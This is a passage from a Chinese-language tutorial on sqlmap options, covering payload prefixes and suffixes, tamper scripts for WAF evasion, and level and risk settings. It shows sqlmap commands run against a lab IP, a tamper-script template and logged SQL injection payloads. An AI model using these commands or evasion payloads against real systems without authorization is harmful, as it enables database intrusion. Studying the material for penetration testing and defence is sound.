id=\"%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%B3%BB%E7%BB%9F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6307\u5b9a\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;os<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u4f1a\u81ea\u52a8\u7684\u63a2\u6d4b\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf\uff0c\u652f\u6301\u7684\u7cfb\u7edf\u6709\uff1a<\/span><span>Linux<\/span><span>\u3001<\/span><span>Windows<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%8C%87%E5%AE%9A%E6%97%A0%E6%95%88%E7%9A%84%E5%A4%A7%E6%95%B0%E5%AD%97\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6307\u5b9a\u65e0\u6548\u7684\u5927\u6570\u5b57<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;invalid-bignum<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4f60\u60f3\u6307\u5b9a\u4e00\u4e2a\u62a5\u9519\u7684\u6570\u503c\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\uff0c\u4f8b\u5982\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>id=13<\/span><span>\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u53d8\u6210<\/span><span>id=-13<\/span><span>\u6765\u62a5\u9519\uff0c\u4f60\u53ef\u4ee5\u6307\u5b9a\u6bd4\u5982<\/span><span>id=9999999<\/span><span>\u6765\u62a5\u9519\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%8F%AA%E5%AE%9A%E6%97%A0%E6%95%88%E7%9A%84%E9%80%BB%E8%BE%91\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6307\u5b9a\u65e0\u6548\u7684\u903b\u8f91<\/span><span 
style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;invalid-logical<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u539f\u56e0\u540c\u4e0a\uff0c\u53ef\u4ee5\u6307\u5b9a<span>id=13<\/span><span>\u628a\u539f\u6765\u7684<\/span><span>id=-13<\/span><span>\u7684\u62a5\u9519\u6539\u6210<\/span><span>id=13&nbsp;AND&nbsp;18=19<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B3%A8%E5%85%A5payload\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6ce8\u5165payload<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;prefix,&#8211;suffix<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728\u6709\u4e9b\u73af\u5883\u4e2d\uff0c\u9700\u8981\u5728\u6ce8\u5165\u7684<span>payload<\/span><span>\u7684\u524d\u9762\u6216\u8005\u540e\u9762\u52a0\u4e00\u4e9b\u5b57\u7b26\uff0c\u6765\u4fdd\u8bc1<\/span><span>payload<\/span><span>\u7684\u6b63\u5e38\u6267\u884c\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u4f8b\u5982\uff0c\u4ee3\u7801\u4e2d\u662f\u8fd9\u6837\u8c03\u7528\u6570\u636e\u5e93\u7684\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$query&nbsp;=&nbsp;&#8220;SELECT&nbsp;*&nbsp;FROM&nbsp;users&nbsp;WHERE&nbsp;id=(\u2019&#8221;&nbsp;.&nbsp;$_GET[\u2019id\u2019]&nbsp;.&nbsp;&#8220;\u2019)&nbsp;LIMIT&nbsp;0,&nbsp;1&#8221;;&nbsp;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u65f6\u4f60\u5c31\u9700\u8981<span>&#8211;prefix<\/span><span>\u548c<\/span><span>&#8211;suffix<\/span><span>\u53c2\u6570\u4e86\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mysql\/get_str_brackets.php?id=1&#8221;&nbsp;-p&nbsp;id&nbsp;&#8211;prefix&nbsp;&#8220;\u2019)&#8221;&nbsp;&#8211;suffix&nbsp;&#8220;AND&nbsp;(\u2019abc\u2019=\u2019abc&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u6837\u6267\u884c\u7684<span>SQL<\/span><span>\u8bed\u53e5\u53d8\u6210\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$query&nbsp;=&nbsp;&#8220;SELECT&nbsp;*&nbsp;FROM&nbsp;users&nbsp;WHERE&nbsp;id=(\u20191\u2019)&nbsp;&lt;PAYLOAD&gt;&nbsp;AND&nbsp;(\u2019abc\u2019=\u2019abc\u2019)&nbsp;LIMIT&nbsp;0,&nbsp;1&#8221;;&nbsp;<\/span><span 
style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BF%AE%E6%94%B9%E6%B3%A8%E5%85%A5%E7%9A%84%E6%95%B0%E6%8D%AE\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4fee\u6539\u6ce8\u5165\u7684\u6570\u636e<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;tamper<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u9664\u4e86\u4f7f\u7528<\/span><span>CHAR()<\/span><span>\u51fd\u6570\u6765\u9632\u6b62\u51fa\u73b0\u5355\u5f15\u53f7\u4e4b\u5916\u6ca1\u6709\u5bf9\u6ce8\u5165\u7684\u6570\u636e\u4fee\u6539\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528<\/span><span>&#8211;tamper<\/span><span>\u53c2\u6570\u5bf9\u6570\u636e\u505a\u4fee\u6539\u6765\u7ed5\u8fc7<\/span><span>WAF<\/span><span>\u7b49\u8bbe\u5907\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e0b\u9762\u662f\u4e00\u4e2a<span>tamper<\/span><span>\u811a\u672c\u7684\u683c\u5f0f\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">#&nbsp;Needed&nbsp;imports<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">from&nbsp;lib.core.enums&nbsp;import&nbsp;PRIORITY<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">#&nbsp;Define&nbsp;which&nbsp;is&nbsp;the&nbsp;order&nbsp;of&nbsp;application&nbsp;of&nbsp;tamper&nbsp;scripts&nbsp;against<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">#&nbsp;the&nbsp;payload<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">__priority__&nbsp;=&nbsp;PRIORITY.NORMAL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">def&nbsp;tamper(payload):<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;'''<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Description&nbsp;of&nbsp;your&nbsp;tamper&nbsp;script<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;'''<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;retVal&nbsp;=&nbsp;payload<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;your&nbsp;code&nbsp;to&nbsp;tamper&nbsp;the&nbsp;original&nbsp;payload<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;return&nbsp;the&nbsp;tampered&nbsp;payload<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;retVal<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u67e5\u770b&nbsp;<span>tamper\/&nbsp;<\/span><span>\u76ee\u5f55\u4e0b\u7684\u6709\u54ea\u4e9b\u53ef\u7528\u7684\u811a\u672c<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mysql\/get_int.php?id=1&#8221;&nbsp;&#8211;tamper&nbsp;tamper\/between.py,tamper\/randomcase.py,tamper\/space2comment.py&nbsp;-v&nbsp;3<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:03]&nbsp;[DEBUG]&nbsp;cleaning&nbsp;up&nbsp;configuration&nbsp;parameters<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:03]&nbsp;[INFO]&nbsp;loading&nbsp;tamper&nbsp;script&nbsp;&#8216;between&#8217;<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:03]&nbsp;[INFO]&nbsp;loading&nbsp;tamper&nbsp;script&nbsp;&#8216;randomcase&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:03]&nbsp;[INFO]&nbsp;loading&nbsp;tamper&nbsp;script&nbsp;&#8216;space2comment&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;AND&nbsp;boolean-based&nbsp;blind&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[PAYLOAD]&nbsp;1)\/**\/And\/**\/1369=7706\/**\/And\/**\/(4092=4092<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[PAYLOAD]&nbsp;1)\/**\/AND\/**\/9267=9267\/**\/AND\/**\/(4057=4057<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[PAYLOAD]&nbsp;1\/**\/AnD\/**\/950=7041<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&gt;=&nbsp;5.0&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[PAYLOAD]&nbsp;1\/**\/anD\/**\/(SELeCt\/**\/9921\/**\/fROm(SELeCt\/**\/counT(*),CONCAT(cHar(<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">58,117,113,107,58),(SELeCt\/**\/(case\/**\/whEN\/**\/(9921=9921)\/**\/THeN\/**\/1\/**\/elsE\/**\/0\/**\/<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x\/**\/fROm\/**\/information_schema.tables\/**\/<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">group\/**\/bY\/**\/x)a)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;MySQL&nbsp;&gt;=&nbsp;5.0&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">clause&#8217;&nbsp;injectable<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span 
style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E6%8E%A2%E6%B5%8B\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u63a2\u6d4b<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%8E%A2%E6%B5%8B%E7%AD%89%E7%BA%A7\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u63a2\u6d4b\u7b49\u7ea7<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;level<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5171\u6709\u4e94\u4e2a\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u4e3a<span>1<\/span><span>\uff0c<\/span><span>sqlmap<\/span><span>\u4f7f\u7528\u7684<\/span><span>payload<\/span><span>\u53ef\u4ee5\u5728<\/span><span>xml\/payloads.xml<\/span><span>\u4e2d\u770b\u5230\uff0c\u4f60\u4e5f\u53ef\u4ee5\u6839\u636e\u76f8\u5e94\u7684\u683c\u5f0f\u6dfb\u52a0\u81ea\u5df1\u7684<\/span><span>payload<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u8fd9\u4e2a\u53c2\u6570\u4e0d\u4ec5\u5f71\u54cd\u4f7f\u7528\u54ea\u4e9b<span>payload<\/span><span>\u540c\u65f6\u4e5f\u4f1a\u5f71\u54cd\u6d4b\u8bd5\u7684\u6ce8\u5165\u70b9\uff0c<\/span><span>GET<\/span><span>\u548c<\/span><span>POST<\/span><span>\u7684\u6570\u636e\u90fd\u4f1a\u6d4b\u8bd5\uff0c<\/span><span>HTTP&nbsp;Cookie<\/span><span>\u5728<\/span><span>level<\/span><span>\u4e3a<\/span><span>2<\/span><span>\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\uff0c<\/span><span>HTTP&nbsp;User-Agent\/Referer<\/span><span>\u5934\u5728<\/span><span>level<\/span><span>\u4e3a<\/span><span>3<\/span><span>\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u603b\u4e4b\u5728\u4f60\u4e0d\u786e\u5b9a\u54ea\u4e2a<span>payload<\/span><span>\u6216\u8005\u53c2\u6570\u4e3a\u6ce8\u5165\u70b9\u7684\u65f6\u5019\uff0c\u4e3a\u4e86\u4fdd\u8bc1\u5168\u9762\u6027\uff0c\u5efa\u8bae\u4f7f\u7528\u9ad8\u7684<\/span><span>level<\/span><span>\u503c\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%A3%8E%E9%99%A9%E7%AD%89%E7%BA%A7\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u98ce\u9669\u7b49\u7ea7<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;risk<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5171\u6709\u56db\u4e2a\u98ce\u9669\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u662f<span>1<\/span><span>\u4f1a\u6d4b\u8bd5\u5927\u90e8\u5206\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c<\/span><span>2<\/span><span>\u4f1a\u589e\u52a0\u57fa\u4e8e\u65f6\u95f4\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c<\/span><span>3<\/span><span>\u4f1a\u589e\u52a0<\/span><span>OR<\/span><span>\u8bed\u53e5\u7684<\/span><span>SQL<\/span><span>\u6ce8\u5165\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728\u6709\u4e9b\u65f6\u5019\uff0c\u4f8b\u5982\u5728<span>UPDATE<\/span><span>\u7684\u8bed\u53e5\u4e2d\uff0c\u6ce8\u5165\u4e00\u4e2a<\/span><span>OR<\/span><span>\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c\u53ef\u80fd\u5bfc\u81f4\u66f4\u65b0\u6574\u4e2a\u8868\uff0c\u53ef\u80fd\u9020\u6210\u5f88\u5927\u7684\u98ce\u9669\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6d4b\u8bd5\u7684\u8bed\u53e5\u540c\u6837\u53ef\u4ee5\u5728<span>xml\/payloads.xml<\/span><span>\u4e2d\u627e\u5230\uff0c\u4f60\u4e5f\u53ef\u4ee5\u81ea\u884c\u6dfb\u52a0<\/span><span>payload<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%A1%B5%E9%9D%A2%E6%AF%94%E8%BE%83\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u9875\u9762\u6bd4\u8f83<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--string,--not-string,--regexp,--code<\/span><\/span><span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u901a\u8fc7\u5224\u65ad\u8fd4\u56de\u9875\u9762\u7684\u4e0d\u540c\u6765\u5224\u65ad\u771f\u5047\uff0c\u4f46\u6709\u65f6\u5019\u8fd9\u4f1a\u4ea7\u751f\u8bef\u5dee\uff0c\u56e0\u4e3a\u6709\u7684\u9875\u9762\u5728\u6bcf\u6b21\u5237\u65b0\u7684\u65f6\u5019\u90fd\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u4ee3\u7801\uff0c\u6bd4\u5982\u9875\u9762\u5f53\u4e2d&nbsp;\u5305\u542b\u4e00\u4e2a\u52a8\u6001\u7684\u5e7f\u544a\u6216\u8005\u5176\u4ed6\u5185\u5bb9\uff0c\u8fd9\u4f1a\u5bfc\u81f4<\/span><span>sqlmap<\/span><span>\u7684\u8bef\u5224\u3002\u6b64\u65f6\u7528\u6237\u53ef\u4ee5\u63d0\u4f9b\u4e00\u4e2a\u5b57\u7b26\u4e32\u6216\u8005\u4e00\u6bb5\u6b63\u5219\u5339\u914d\uff0c\u5728\u539f\u59cb\u9875\u9762\u4e0e\u771f\u6761\u4ef6\u4e0b\u7684\u9875\u9762\u90fd\u5b58\u5728\u7684\u5b57\u7b26&nbsp;\u4e32\uff0c\u800c\u9519\u8bef\u9875\u9762\u4e2d\u4e0d\u5b58\u5728\uff08\u4f7f\u7528<\/span><span>&#8211;string<\/span><span>\u53c2\u6570\u6dfb\u52a0\u5b57\u7b26\u4e32\uff0c<\/span><span>&#8211;regexp<\/span><span>\u6dfb\u52a0\u6b63\u5219\uff09\uff0c\u540c\u65f6\u7528\u6237\u53ef\u4ee5\u63d0\u4f9b\u4e00\u6bb5\u5b57\u7b26\u4e32\u5728\u539f\u59cb\u9875\u9762\u4e0e\u771f\u6761\u4ef6\u4e0b\u7684\u9875\u9762\u90fd\u4e0d&nbsp;\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u9519\u8bef\u9875\u9762\u4e2d\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff08<\/span><span>&#8211;not-string<\/span><span>\u6dfb\u52a0\uff09\u3002\u7528\u6237\u4e5f\u53ef\u4ee5\u63d0\u4f9b\u771f\u4e0e\u5047\u6761\u4ef6\u8fd4\u56de\u7684<\/span><span>HTTP<\/span><span>\u72b6\u6001\u7801\u4e0d\u4e00\u6837\u6765\u6ce8\u5165\uff0c\u4f8b\u5982\uff0c\u54cd\u5e94&nbsp;<\/span><span>200<\/span><span>\u7684\u65f6\u5019\u4e3a\u771f\uff0c\u54cd\u5e94<\/span><span>401<\/span><span>\u7684\u65f6\u5019\u4e3a\u5047\uff0c\u53ef\u4ee5\u6df
